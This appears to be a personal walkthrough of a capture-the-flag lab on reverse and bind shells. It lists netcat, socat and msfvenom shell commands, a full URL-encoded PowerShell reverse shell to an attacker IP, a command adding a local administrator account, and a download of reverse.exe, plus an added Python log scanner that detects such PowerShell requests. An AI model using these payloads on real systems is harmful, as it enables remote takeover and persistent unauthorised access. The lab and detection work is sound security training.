What the shell?

February 07, 2024

Task 1: What is a shell?

Task 2: Tools

Task 3: Types of shell

Task 4: Netcat

Task 5: Netcat Shell Stabilisation

Task 6: Socat

Task 7: Socat Encrypted Shells

Task 8: Common Shell Payloads

Task 9: msfvenom

Task 10: Metasploit multi/handler

Task 11: WebShells

Task 12: Next Steps

Task 13: Practice and Examples

Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine. Navigate to /usr/share/webshells/php/php-reverse-shell.php in Kali and change the IP and port to match your tun0 IP with a custom port. Set up a netcat listener, then upload and activate the shell.

Log into the Linux machine over SSH using the credentials in task 14. Use the techniques in Task 8 to experiment with bind and reverse netcat shells.

msfvenom -p cmd/unix/reverse_netcat lhost=10.9.193.229 lport=4444 R

OR

Practice reverse and bind shells using Socat on the Linux machine. Try both the normal and special techniques.

  • Start a listener, then connect back from the victim's machine with the socat exec option

  • Connect to the victim machine using socat and specify the port

Look through PayloadsAllTheThings and try some of the other reverse shell techniques. Try to analyse them and see why they work.

  • First python reverse shell

  • Second bash reverse shell

  • Third perl reverse shell

Switch to the Windows VM. Try uploading and activating the php-reverse-shell. Does this work?

  • Powershell reverse shell

  • Webshell php reverse shell

Put this URL-encoded PowerShell command into the URL:

powershell%20-nop%20-W%20hidden%20-noni%20-ep%20bypass%20-c%20%22%24TCPClient%20%3D%20New-Object%20Net.Sockets.TCPClient%28%2710.9.193.229%27%2C%204444%29%3B%24NetworkStream%20%3D%20%24TCPClient.GetStream%28%29%3B%24StreamWriter%20%3D%20New-Object%20IO.StreamWriter%28%24NetworkStream%29%3Bfunction%20WriteToStream%20%28%24String%29%20%7B%5Bbyte%5B%5D%5D%24script%3ABuffer%20%3D%200..%24TCPClient.ReceiveBufferSize%20%7C%20%25%20%7B0%7D%3B%24StreamWriter.Write%28%24String%20%2B%20%27SHELL%3E%20%27%29%3B%24StreamWriter.Flush%28%29%7DWriteToStream%20%27%27%3Bwhile%28%28%24BytesRead%20%3D%20%24NetworkStream.Read%28%24Buffer%2C%200%2C%20%24Buffer.Length%29%29%20-gt%200%29%20%7B%24Command%20%3D%20%28%5Btext.encoding%5D%3A%3AUTF8%29.GetString%28%24Buffer%2C%200%2C%20%24BytesRead%20-%201%29%3B%24Output%20%3D%20try%20%7BInvoke-Expression%20%24Command%202%3E%261%20%7C%20Out-String%7D%20catch%20%7B%24_%20%7C%20Out-String%7DWriteToStream%20%28%24Output%29%7D%24StreamWriter.Close%28%29%22

Even if the file is deleted, as long as it is already inside (running), the admin only needs to end the task in Task Manager for it to go away.

The webserver is running with SYSTEM privileges. Create a new user and add it to the "Administrators" group, then log in over RDP or WinRM.

powershell%20-command%20%22%24username%20%3D%20%27kyou22%27%3B%20%24password%20%3D%20ConvertTo-SecureString%20%27YourPassword%27%20-AsPlainText%20-Force%3B%20New-LocalUser%20-Name%20%24username%20-Password%20%24password%20-FullName%20%27kyou22%27%20-Description%20%27Description%20of%20the%20new%20user%27%3B%20Add-LocalGroupMember%20-Group%20%27Administrators%27%20-Member%20%24username%22%0A
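The two URL-encoded commands above (the hidden-window PowerShell TCP client and the local-admin account creation) leave a distinctive trail in the web server's access log. As an added example that is not part of the original notes, this Python script percent-decodes each request target and flags those indicators; the log lines, the IP 192.0.2.10 and the paths are constructed for the example.

```python
"""Flag access-log requests whose query string carries a URL-encoded PowerShell
launch (hidden window, policy bypass, TCP client) or a local-admin account change.
Sample log lines below are constructed for this example."""
import re
from typing import Optional
from urllib.parse import unquote

# Indicators drawn from the two encoded commands on this page; matched lower-cased.
INDICATORS = {
    "powershell_launch": re.compile(r"\bpowershell(\.exe)?\b"),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden"),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass"),
    "tcp_client": re.compile(r"net\.sockets\.tcpclient"),
    "invoke_expression": re.compile(r"invoke-expression|\biex\b"),
    "local_admin_add": re.compile(r"new-localuser|add-localgroupmember"),
}

# Common log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are still visible."""
    current = target
    for _ in range(rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current.lower()

def scan_line(line: str) -> Optional[dict]:
    """Return an alert dict for a suspicious request, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    # A bare "powershell" (e.g. a search term) is noise; require a second indicator,
    # or an account-change cmdlet on its own.
    if "local_admin_add" not in hits and not ("powershell_launch" in hits and len(hits) >= 2):
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"), "hits": hits}

def scan(lines) -> list:
    return [a for a in (scan_line(l) for l in lines) if a]

SAMPLE_LOG = [  # constructed
    '10.0.0.5 - - [07/Feb/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [07/Feb/2024:10:00:09 +0000] "GET /search.php?q=powershell%20tutorial HTTP/1.1" 200 880',
    '10.0.0.9 - - [07/Feb/2024:10:02:13 +0000] "GET /uploads/shell.php?cmd=powershell%20-nop%20-W%20hidden%20-noni%20-ep%20bypass%20-c%20%22%24c%20%3D%20New-Object%20Net.Sockets.TCPClient%28%27192.0.2.10%27%2C%204444%29%22 HTTP/1.1" 200 0',
    '10.0.0.9 - - [07/Feb/2024:10:05:40 +0000] "GET /uploads/shell.php?cmd=powershell%20-command%20%22New-LocalUser%20-Name%20%27x%27%22 HTTP/1.1" 200 0',
]
```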

Create a 64-bit Windows Meterpreter shell using msfvenom and upload it to the Windows target. Activate the shell and catch it with multi/handler. Experiment with the features of this shell.

Create both staged and stageless meterpreter shells for either target. Upload and manually activate them, catching the shell with netcat -- does this work?

  • STAGELESS REVERSE SHELL

Invoke-WebRequest -Uri http://10.9.193.229:8000/reverse.exe -OutFile reverse.exe
